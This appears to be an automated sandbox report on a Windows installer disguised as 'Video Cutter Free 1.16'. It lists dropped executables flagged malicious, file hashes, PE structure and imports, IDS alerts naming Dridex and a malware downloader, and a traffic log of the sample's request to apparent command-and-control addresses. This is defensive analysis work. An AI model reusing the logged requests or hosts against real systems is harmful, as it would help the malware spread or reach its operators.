                                                                            SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                            SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                            SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):645592
                                                                            Entropy (8bit):6.50414583238337
                                                                            Encrypted:false
                                                                            SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                            MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                            SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                            SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                            SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):716789
                                                                            Entropy (8bit):6.514241987335794
                                                                            Encrypted:false
                                                                            SSDEEP:12288:cTPcYn5c/rPx37/zHBA6a5Ueyp2CrIEROlnrNORuIVwRxyFl:APcYn5c/rPx37/zHBA6pDp2mIEiICRxC
                                                                            MD5:175EFFAA31D6EEFEBFCC6DF33BBA0011
                                                                            SHA1:4625EB78AA715BB49BFAF305596A7E5506402119
                                                                            SHA-256:39F139DC1914F1289D4F077B9FCD15C8A03BE4E30CD4910A0B2B5E5F7C4F2F0B
                                                                            SHA-512:3D0EA7214C10BB97E6FDAE451425BB961A2B83C8BFE326339C32E533647545D12F8276573347AE719AD37CD5D092CFFA3ABFB96DDAE622F291E309C65C04E8C7
                                                                            Malicious:true
                                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................z........................@..............................................@...............................%..................................................................................................................CODE....\y.......z.................. ..`DATA.................~..............@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc...... ......................@..P.rsrc...............................@..P.....................P..............@..P........................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:InnoSetup Log Video Cutter Free, version 0x30, 4882 bytes, 445817\user, "C:\Users\user\AppData\Local\Video Cutter Free 1.16"
                                                                            Category:dropped
                                                                            Size (bytes):4882
                                                                            Entropy (8bit):4.74626718688299
                                                                            Encrypted:false
                                                                            SSDEEP:96:VgyWpJ8epmEM+9C+eOIhza7ICSss/LnLI6:VgyWpJRpmE5HIhcICSsAn/
                                                                            MD5:C1F7F9F1B82869293569B2BE05182933
                                                                            SHA1:C34C5A9E8E31BDF2738F3D53535F75393667B2A0
                                                                            SHA-256:6E7A4F61792D2129F802272DBFCE7E0224CDCDC4B995174E4C126F17417ADA27
                                                                            SHA-512:5B0CFE890D14D5EE970BC7BBC5211F73B2761CE67A2B029FFD76E46FE793984B1C46C36A23E69C16E10BCC8EFCC0BC7F3DF003CC7CFBBCDDA4A20BB364001A2A
                                                                            Malicious:false
                                                                            Preview:Inno Setup Uninstall Log (b)....................................Video Cutter Free...............................................................................................................Video Cutter Free...............................................................................................................0...........%..................................................................................................................4........>M\.......U....445817.user4C:\Users\user\AppData\Local\Video Cutter Free 1.16..........."...... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:U
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):716789
                                                                            Entropy (8bit):6.514241987335794
                                                                            Encrypted:false
                                                                            SSDEEP:12288:cTPcYn5c/rPx37/zHBA6a5Ueyp2CrIEROlnrNORuIVwRxyFl:APcYn5c/rPx37/zHBA6pDp2mIEiICRxC
                                                                            MD5:175EFFAA31D6EEFEBFCC6DF33BBA0011
                                                                            SHA1:4625EB78AA715BB49BFAF305596A7E5506402119
                                                                            SHA-256:39F139DC1914F1289D4F077B9FCD15C8A03BE4E30CD4910A0B2B5E5F7C4F2F0B
                                                                            SHA-512:3D0EA7214C10BB97E6FDAE451425BB961A2B83C8BFE326339C32E533647545D12F8276573347AE719AD37CD5D092CFFA3ABFB96DDAE622F291E309C65C04E8C7
                                                                            Malicious:true
                                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................z........................@..............................................@...............................%..................................................................................................................CODE....\y.......z.................. ..`DATA.................~..............@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc...... ......................@..P.rsrc...............................@..P.....................P..............@..P........................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:MS Windows HtmlHelp Data
                                                                            Category:dropped
                                                                            Size (bytes):78183
                                                                            Entropy (8bit):7.692742945771669
                                                                            Encrypted:false
                                                                            SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                            MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                            SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                            SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                            SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                            Malicious:false
                                                                            Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):176128
                                                                            Entropy (8bit):6.204917493416147
                                                                            Encrypted:false
                                                                            SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                            MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                            SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                            SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                            SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:modified
                                                                            Size (bytes):4005103
                                                                            Entropy (8bit):6.385094908393869
                                                                            Encrypted:false
                                                                            SSDEEP:49152:BTUC8iCySyQWcZTGswsorvEmYZv71CCxOPSCgauYWMZsUgT43tG8V:hOW0TGswssgv71CjPSCgaupMZa4T
                                                                            MD5:F00EE01B4436F8DD28084F015B123ECC
                                                                            SHA1:C3C00505968617B33BF22C2955CA882B2B7E0810
                                                                            SHA-256:7F99B4F27FF33CFCA71F5E5B6645D2DD6F3D0D65CD97421F55317501B444D236
                                                                            SHA-512:BB9B5E2726BB34088D05C1AEA76FDA6973D8349E8F963FA5EFE02347F89F33D1AA69469BF5DBAFBFB255F8CE5E5540867E3027B1FEA3B512BD2ABF04E248DDC0
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............E...E...E...E...Eu..E...E...E...E...E...E...E ..E.onE...E...E...E1..E...ERich...E........PE..L.....Wg.............................O............@...........................=.....R.=.....................................$........@...!..............................................................................L............................text...z........................... ..`.rdata..$...........................@..@.data....d.......0..................@....rsrc...."...@..."..................@..@.adtt3...."..p....".................`.'.........................................................................................................................................................................................................................................................................................................................................
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.9982598691902655
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                            • Inno Setup installer (109748/4) 1.08%
                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            File name:imMQqf6YWk.exe
                                                                            File size:3'915'755 bytes
                                                                            MD5:c9019cfc066b4cf4439ab3fa00ae3ac9
                                                                            SHA1:0ae7c04b0cbcc96bf8388062135bc0484981c3c2
                                                                            SHA256:798418d2b435a7feab725f614e2b77b3e311c9b859dec456edccc42af6982426
                                                                            SHA512:a991103cf684343e1a032ce78532799f3301c72703d1aedb7ea67aa537d7c93f96a8a7f0be6f62ac7f349b43d2e7a3e1e8a4a25249ad703daf9acb55609c625b
                                                                            SSDEEP:98304:Igwzv2TAvqFWW3d7nN40u+hycoSjH2G6jdYHCXN0/W22:pJ6qIW3d7nnuOnejlW/WP
                                                                            TLSH:B3063321C6C548BEFA2A48B76E14815F1F9B7C1619B8A6223CC584DD0F6BBDD993DF00
                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                            Icon Hash:2d2e3797b32b2b99
                                                                            Entrypoint:0x409c40
                                                                            Entrypoint Section:CODE
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:1
                                                                            OS Version Minor:0
                                                                            File Version Major:1
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:1
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                            Instruction
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            add esp, FFFFFFC4h
                                                                            push ebx
                                                                            push esi
                                                                            push edi
                                                                            xor eax, eax
                                                                            mov dword ptr [ebp-10h], eax
                                                                            mov dword ptr [ebp-24h], eax
                                                                            call 00007FB5907F786Bh
                                                                            call 00007FB5907F8A72h
                                                                            call 00007FB5907F8D01h
                                                                            call 00007FB5907F8DA4h
                                                                            call 00007FB5907FAD43h
                                                                            call 00007FB5907FD6AEh
                                                                            call 00007FB5907FD815h
                                                                            xor eax, eax
                                                                            push ebp
                                                                            push 0040A2FCh
                                                                            push dword ptr fs:[eax]
                                                                            mov dword ptr fs:[eax], esp
                                                                            xor edx, edx
                                                                            push ebp
                                                                            push 0040A2C5h
                                                                            push dword ptr fs:[edx]
                                                                            mov dword ptr fs:[edx], esp
                                                                            mov eax, dword ptr [0040C014h]
                                                                            call 00007FB5907FE27Bh
                                                                            call 00007FB5907FDEAEh
                                                                            lea edx, dword ptr [ebp-10h]
                                                                            xor eax, eax
                                                                            call 00007FB5907FB368h
                                                                            mov edx, dword ptr [ebp-10h]
                                                                            mov eax, 0040CE24h
                                                                            call 00007FB5907F7917h
                                                                            push 00000002h
                                                                            push 00000000h
                                                                            push 00000001h
                                                                            mov ecx, dword ptr [0040CE24h]
                                                                            mov dl, 01h
                                                                            mov eax, 0040738Ch
                                                                            call 00007FB5907FBBF7h
                                                                            mov dword ptr [0040CE28h], eax
                                                                            xor edx, edx
                                                                            push ebp
                                                                            push 0040A27Dh
                                                                            push dword ptr fs:[edx]
                                                                            mov dword ptr fs:[edx], esp
                                                                            call 00007FB5907FE2EBh
                                                                            mov dword ptr [0040CE30h], eax
                                                                            mov eax, dword ptr [0040CE30h]
                                                                            cmp dword ptr [eax+0Ch], 01h
                                                                            jne 00007FB5907FE42Ah
                                                                            mov eax, dword ptr [0040CE30h]
                                                                            mov edx, 00000028h
                                                                            call 00007FB5907FBFF8h
                                                                            mov edx, dword ptr [00000030h]
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            CODE0x10000x93640x9400e8a38c5eb0d717d3fb478c7e19f20477False0.6147856841216216data6.563139352016593IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            DATA0xb0000x24c0x4005d98c64569668b0235ae89005918165aFalse0.3046875data2.7373065622921344IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            BSS0xc0000xe880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                            .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x110000x2c000x2c00567c0aa1f542d9702a3edd7a1af9a832False0.326171875data4.498451729910216IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                            RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                            RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                            RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                            RT_STRING0x125740x2f2data0.35543766578249336
                                                                            RT_STRING0x128680x30cdata0.3871794871794872
                                                                            RT_STRING0x12b740x2cedata0.42618384401114207
                                                                            RT_STRING0x12e440x68data0.75
                                                                            RT_STRING0x12eac0xb4data0.6277777777777778
                                                                            RT_STRING0x12f600xaedata0.5344827586206896
                                                                            RT_RCDATA0x130100x2cdata1.2045454545454546
                                                                            RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                            RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.27483443708609273
                                                                            RT_MANIFEST0x135340x5a4XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.42590027700831024
                                                                            DLLImport
                                                                            kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                            user32.dllMessageBoxA
                                                                            oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                            kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                            user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                            comctl32.dllInitCommonControls
                                                                            advapi32.dllAdjustTokenPrivileges
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            DutchNetherlands
                                                                            EnglishUnited States
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-12-10T14:36:27.223217+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549933188.119.66.185443TCP
                                                                            2024-12-10T14:36:27.910797+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549933188.119.66.185443TCP
                                                                            2024-12-10T14:36:32.934097+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549945188.119.66.185443TCP
                                                                            2024-12-10T14:36:33.620187+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549945188.119.66.185443TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 10, 2024 14:36:25.568021059 CET49933443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:25.568051100 CET44349933188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:25.568141937 CET49933443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:25.577380896 CET49933443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:25.577393055 CET44349933188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:27.223103046 CET44349933188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:27.223217010 CET49933443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:27.273987055 CET49933443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:27.273997068 CET44349933188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:27.274271011 CET44349933188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:27.274338007 CET49933443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:27.276602030 CET49933443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:27.323337078 CET44349933188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:27.910813093 CET44349933188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:27.910875082 CET44349933188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:27.910907984 CET49933443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:27.910938025 CET49933443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:27.912550926 CET49933443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:27.912561893 CET44349933188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:27.913552046 CET499392024192.168.2.531.214.157.206
                                                                            Dec 10, 2024 14:36:28.032847881 CET20244993931.214.157.206192.168.2.5
                                                                            Dec 10, 2024 14:36:28.032944918 CET499392024192.168.2.531.214.157.206
                                                                            Dec 10, 2024 14:36:28.033023119 CET499392024192.168.2.531.214.157.206
                                                                            Dec 10, 2024 14:36:28.152437925 CET20244993931.214.157.206192.168.2.5
                                                                            Dec 10, 2024 14:36:28.152681112 CET499392024192.168.2.531.214.157.206
                                                                            Dec 10, 2024 14:36:28.272078991 CET20244993931.214.157.206192.168.2.5
                                                                            Dec 10, 2024 14:36:29.286015987 CET20244993931.214.157.206192.168.2.5
                                                                            Dec 10, 2024 14:36:29.340382099 CET499392024192.168.2.531.214.157.206
                                                                            Dec 10, 2024 14:36:31.296075106 CET49945443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:31.296112061 CET44349945188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:31.296196938 CET49945443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:31.296454906 CET49945443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:31.296466112 CET44349945188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:32.934019089 CET44349945188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:32.934097052 CET49945443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:32.934621096 CET49945443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:32.934629917 CET44349945188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:32.934830904 CET49945443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:32.934834957 CET44349945188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:33.620229006 CET44349945188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:33.620297909 CET49945443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:33.620300055 CET44349945188.119.66.185192.168.2.5
                                                                            Dec 10, 2024 14:36:33.620352030 CET49945443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:33.620508909 CET49945443192.168.2.5188.119.66.185
                                                                            Dec 10, 2024 14:36:33.620526075 CET44349945188.119.66.185192.168.2.5
                                                                            • 188.119.66.185
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.549933188.119.66.1854436460C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-10 13:36:27 UTC283OUTGET /ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021ddd3b271ed4328f HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Host: 188.119.66.185
                                                                            2024-12-10 13:36:27 UTC200INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 10 Dec 2024 13:36:27 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: PHP/7.4.33
                                                                            2024-12-10 13:36:27 UTC810INData Raw: 33 31 65 0d 0a 38 62 37 32 33 63 36 38 65 65 31 38 34 30 33 63 36 36 30 66 62 66 65 30 33 38 34 63 32 37 62 36 62 63 38 66 38 30 32 32 34 63 62 64 33 62 63 31 39 30 32 34 39 66 37 65 31 36 66 65 30 34 64 64 65 37 36 37 34 62 62 33 35 63 38 64 31 65 33 66 37 38 37 61 61 30 61 66 30 64 39 62 66 35 30 31 64 32 39 39 62 31 63 61 32 39 37 34 64 35 66 36 34 63 63 34 39 36 66 63 35 32 64 36 64 62 39 63 35 66 61 64 62 36 66 34 63 31 30 33 30 32 63 33 64 34 31 62 31 66 64 64 33 31 33 61 31 62 64 32 33 32 39 32 64 35 64 30 39 31 35 37 34 39 63 39 37 30 33 34 66 32 64 34 30 33 34 62 36 64 31 36 36 63 63 63 66 37 31 31 36 38 62 62 66 37 35 36 61 34 65 66 65 62 35 32 61 61 37 66 63 32 63 66 33 66 66 32 66 35 64 38 65 61 34 64 30 65 38 64 35 62 39 32 33 34 61 63 33 34
